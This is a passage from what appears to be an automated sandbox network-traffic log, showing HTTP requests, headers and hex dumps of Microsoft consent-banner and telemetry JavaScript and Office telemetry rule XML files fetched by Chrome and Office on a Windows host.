                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                            Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                            Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                            Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                            Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                            Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            115192.168.2.64984513.107.246.444433064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                            Age: 25939
                                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                            x-ms-request-id: 09b6fa6f-101e-0038-42e3-3b8981000000
                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                            x-azure-ref: 20241121T141753Z-178bfbc474bq2pr7hC1NYCkfgg00000001rg00000000cs6m
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                            Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                            Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                                            Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            116192.168.2.64984813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:54 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                            x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141754Z-178bfbc474bv587zhC1NYCny5w00000001h00000000040uk
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            117192.168.2.64984713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:53 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:54 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1250
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                                            x-ms-request-id: 6fe4cd85-501e-0029-2ea1-3ad0b8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141754Z-178bfbc474btrnf9hC1NYCb80g00000001u0000000004m03
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            118192.168.2.64985013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:54 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                            x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141754Z-1777c6cb754mqztshC1TEB4mkc0000000b6000000000gn6b
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            119192.168.2.64984913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:54 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                            x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141754Z-178bfbc474bh5zbqhC1NYCkdug00000001mg000000000uvf
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:54 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            120192.168.2.64985213.107.246.45443
